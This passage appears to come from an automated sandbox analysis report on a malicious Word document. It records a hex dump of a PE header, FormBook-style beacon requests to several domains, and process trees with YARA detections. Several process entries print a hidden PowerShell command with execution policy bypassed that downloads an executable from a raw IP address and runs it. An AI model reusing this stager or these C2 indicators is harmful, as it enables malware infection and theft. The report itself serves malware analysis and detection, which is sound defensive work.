                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 54 89 9b 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c2 00 00 00 16 0e 00 00 00 00 00 0a 20 0f 00 00 80 0b 00 00 20 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 88 0b 00 4f 00 00 00 00 40 0c 00 10 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0f 00 08 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 48 00 00 00 00 00 00 00 00 00 00 00 12 55 23 6a 3b 46 5f 60 30 58 0b 00 00 20 00 00 00 5a 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 65 78 74 00 00 00 88 be 00 00 00 80 0b 00 00 c0 00 00 00 5e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 b9 02 00 00 40 0c 00 00 ba 02 00 00 1e 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0f 00 00 02 00 00 00 d8 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 10 00 00 00 00 20 0f 00 00 02 00 00 00 da 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 3c eb aa f7 af
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELT`P @ @@|O@ HU#j;F_`0X Z@.text^ `.rsrc@@@.reloc@B `<


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.2249167184.168.131.24180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:35:00.035893917 CEST2039OUTGET /a8si/?yxl4A=IJB8SptPOV&bzrD=4F1bkU/FiIiIeThn0vTtPD5XJl4c4IZLVeanHLI3MyhQ3xDAQVTSUto06Vs10btJG4UKsg== HTTP/1.1
                                              Host: www.boostcoachingonline.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:00.276009083 CEST2039INHTTP/1.1 301 Moved Permanently
                                              Server: nginx/1.16.1
                                              Date: Wed, 12 May 2021 09:35:00 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Location: http://zoom.us/j/8574583197?pwd=R20vRUg0bGh1THUxUDZZQm9JVlRadz09
                                              Data Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.2249168202.210.8.8680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:35:05.872672081 CEST2040OUTGET /a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV HTTP/1.1
                                              Host: www.thepocket-onlinelesson.xyz
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:06.193262100 CEST2040INHTTP/1.1 301 Moved Permanently
                                              Server: nginx
                                              Date: Wed, 12 May 2021 09:35:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Content-Length: 0
                                              Connection: close
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              X-Redirect-By: WordPress
                                              Location: http://thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              6192.168.2.224916975.2.115.19680C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:35:18.773674965 CEST2041OUTGET /a8si/?bzrD=UJpr1KJ3cAfqwplpJdbkHVupvAtN4HJ9rDw4p7p43guJdlFHza1zzh6114vkMzwZ//7Ijg==&yxl4A=IJB8SptPOV HTTP/1.1
                                              Host: www.applewholesales.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:18.930278063 CEST2042INHTTP/1.1 403 Forbidden
                                              Date: Wed, 12 May 2021 09:35:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 146
                                              Connection: close
                                              Server: nginx
                                              Vary: Accept-Encoding
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              7192.168.2.224917034.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:35:24.049107075 CEST2043OUTGET /a8si/?yxl4A=IJB8SptPOV&bzrD=gy017r9A0psIMOBT0kV1AOcU5MENAfyqIllJOlDTSwkHuwjyB7K4Ynwu+ZK1UfHNgI+yKg== HTTP/1.1
                                              Host: www.southernbrushworks.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:24.188290119 CEST2043INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 12 May 2021 09:35:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "60995c0c-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              8192.168.2.2249171107.155.89.7480C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:35:29.433298111 CEST2044OUTGET /a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV HTTP/1.1
                                              Host: www.betsysellsswfl.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:29.600893974 CEST2045INHTTP/1.1 301 Moved Permanently
                                              Date: Wed, 12 May 2021 09:35:29 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Location: https://betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&yxl4A=IJB8SptPOV
                                              Content-Length: 427
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 65 74 73 79 73 65 6c 6c 73 73 77 66 6c 2e 63 6f 6d 2f 61 38 73 69 2f 3f 62 7a 72 44 3d 74 73 42 57 70 47 73 52 5a 6d 79 37 64 37 78 32 6e 68 6c 79 53 79 74 37 6b 55 4a 58 64 69 7a 63 74 4a 73 66 4e 72 74 58 46 45 76 34 6c 46 30 65 4f 71 63 79 71 62 66 30 6e 4a 49 79 59 34 72 6b 4b 56 78 42 45 51 3d 3d 26 61 6d 70 3b 79 78 6c 34 41 3d 49 4a 42 38 53 70 74 50 4f 56 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 65 74 73 79 73 65 6c 6c 73 73 77 66 6c 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://betsysellsswfl.com/a8si/?bzrD=tsBWpGsRZmy7d7x2nhlySyt7kUJXdizctJsfNrtXFEv4lF0eOqcyqbf0nJIyY4rkKVxBEQ==&amp;yxl4A=IJB8SptPOV">here</a>.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.betsysellsswfl.com Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              9192.168.2.2249172209.143.158.1080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              May 12, 2021 11:35:34.885409117 CEST2046OUTGET /a8si/?yxl4A=IJB8SptPOV&bzrD=SdeqJz6wjaIyYsu9X1DHbU17V+TmiEx/wZfEfcHGPKPVmfA4v4050PCPps/OkVYskoJ4SA== HTTP/1.1
                                              Host: www.ethereumdailypay.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              May 12, 2021 11:35:35.223258018 CEST2047INHTTP/1.1 200 OK
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Content-Type: text/html; Charset=utf-8
                                              Expires: Tue, 11 May 2021 09:35:34 GMT
                                              Server: Microsoft-IIS/8.5
                                              Set-Cookie: SITE=distributor%5FID=976489; expires=Thu, 12-May-2022 07:00:00 GMT; path=/; HttpOnly
                                              Set-Cookie: ASPSESSIONIDSQDCABCA=HKOKJNCBGOPBFIOCKFHJPAHG; path=/; HttpOnly; httpOnly
                                              X-Frame-Options: *
                                              Date: Wed, 12 May 2021 09:35:35 GMT
                                              Connection: close
                                              Content-Length: 4633
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 46 72 65 65 20 41 63 63 65 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 69 74 61 6c 69 63 2c 34 30 30 69 74 61 6c 69 63 2c 36 30 30 69 74 61 6c 69 63 2c 37 30 30 69 74 61 6c 69 63 2c 38 30 30 69 74 61 6c 69 63 2c 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 2c 38 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4c 61 74 6f 3a 34 30 30 2c 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 6d 61 67 65 73 72 74 65 2f 64 31 37 31 38 37 39 2f 69 6d 61 67 65 73 2d 6c 65 61 64 6c 69 67 68 74 6e 69 6e 67 2f 73 74 79 6c 65 2d 6c 65 61 64 2d 6c 69 67 68 74 6e 69 6e 67 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 43 72 65 61 74 65 20 61 20 66 72 65 6e 7a 79 20 6f 66 20 72 65 64 20 68 6f 74 20 62 75 79 65 72 73 2e 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 77 20 50 75 73 68 20 42 75 74 74 6f 6e 20 53 79 73 74 65 6d 20 46 6f 72 20 43 72 65 61 74 69 6e 67 20 52 65 64 20 48 6f 74 20 42 75 79 65 72 73 20 61 6e 64 20 46 72 65 73 68 20 4c 65 61 64 73 20 44 61 69 6c 79 2e 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 73 69 74 65 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="keywords" content="Free Access" /><link href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css" /><link href="//fonts.googleapis.com/css?family=Lato:400,700,900" rel="stylesheet" type="text/css" /><link href="/imagesrte/d171879/images-leadlightning/style-lead-lightning.css" rel="stylesheet" /><meta content="Create a frenzy of red hot buyers." name="description" /><meta content="New Push Button System For Creating Red Hot Buyers and Fresh Leads Daily." property="og:title" /><meta content="website" property="og:


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: WINWORD.EXE PID: 2300 Parent PID: 584

                                              General

                                              Start time:11:33:33
                                              Start date:12/05/2021
                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                              Imagebase:0x13f5b0000
                                              File size:1424032 bytes
                                              MD5 hash:95C38D04597050285A18F66039EDB456
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: powershell.exe PID: 2684 Parent PID: 2300

                                              General

                                              Start time:11:33:40
                                              Start date:12/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
                                              Imagebase:0x13f160000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.2097570171.0000000000310000.00000004.00000020.sdmp, Author: Florian Roth
                                              Reputation:high

                                              Analysis Process: FLTLDR.EXE PID: 2384 Parent PID: 2300

                                              General

                                              Start time:11:33:40
                                              Start date:12/05/2021
                                              Path:C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
                                              Imagebase:0x13feb0000
                                              File size:157024 bytes
                                              MD5 hash:AF5CCD95BAC7ADADD56DE185D7461B2C
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Analysis Process: powershell.exe PID: 2788 Parent PID: 2300

                                              General

                                              Start time:11:33:41
                                              Start date:12/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
                                              Imagebase:0x13f160000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.2095013575.0000000000210000.00000004.00000020.sdmp, Author: Florian Roth
                                              Reputation:high

                                              Analysis Process: powershell.exe PID: 2896 Parent PID: 2300

                                              General

                                              Start time:11:33:42
                                              Start date:12/05/2021
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
                                              Imagebase:0x13f160000
                                              File size:473600 bytes
                                              MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000008.00000002.2096198856.0000000000340000.00000004.00000020.sdmp, Author: Florian Roth
                                              Reputation:high

                                              Analysis Process: docsc.exe PID: 2952 Parent PID: 2684

                                              General

                                              Start time:11:33:45
                                              Start date:12/05/2021
                                              Path:C:\Users\user\AppData\Roaming\docsc.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\AppData\Roaming\docsc.exe'
                                              Imagebase:0xbd0000
                                              File size:973824 bytes
                                              MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:.Net C# or VB.NET
                                              Yara matches:
                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.2116660543.000000000238C000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.2118277990.0000000003365000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              Reputation:low

                                              Analysis Process: docsc.exe PID: 2268 Parent PID: 2952

                                              General

                                              Start time:11:33:53
                                              Start date:12/05/2021
                                              Path:C:\Users\user\AppData\Roaming\docsc.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Users\user\AppData\Roaming\docsc.exe
                                              Imagebase:0xbd0000
                                              File size:973824 bytes
                                              MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low

                                              Analysis Process: docsc.exe PID: 2240 Parent PID: 2952

                                              General

                                              Start time:11:33:53
                                              Start date:12/05/2021
                                              Path:C:\Users\user\AppData\Roaming\docsc.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Users\user\AppData\Roaming\docsc.exe
                                              Imagebase:0xbd0000
                                              File size:973824 bytes
                                              MD5 hash:457B22DA77D4DB093A31DD80A4B8963F
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2148206889.0000000000470000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2148099844.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2148173672.0000000000430000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              Analysis Process: explorer.exe PID: 1388 Parent PID: 2240

                                              General

                                              Start time:11:33:56
                                              Start date:12/05/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0xffca0000
                                              File size:3229696 bytes
                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Analysis Process: NAPSTAT.EXE PID: 660 Parent PID: 1388

                                              General

                                              Start time:11:34:06
                                              Start date:12/05/2021
                                              Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                              Imagebase:0xaa0000
                                              File size:279552 bytes
                                              MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
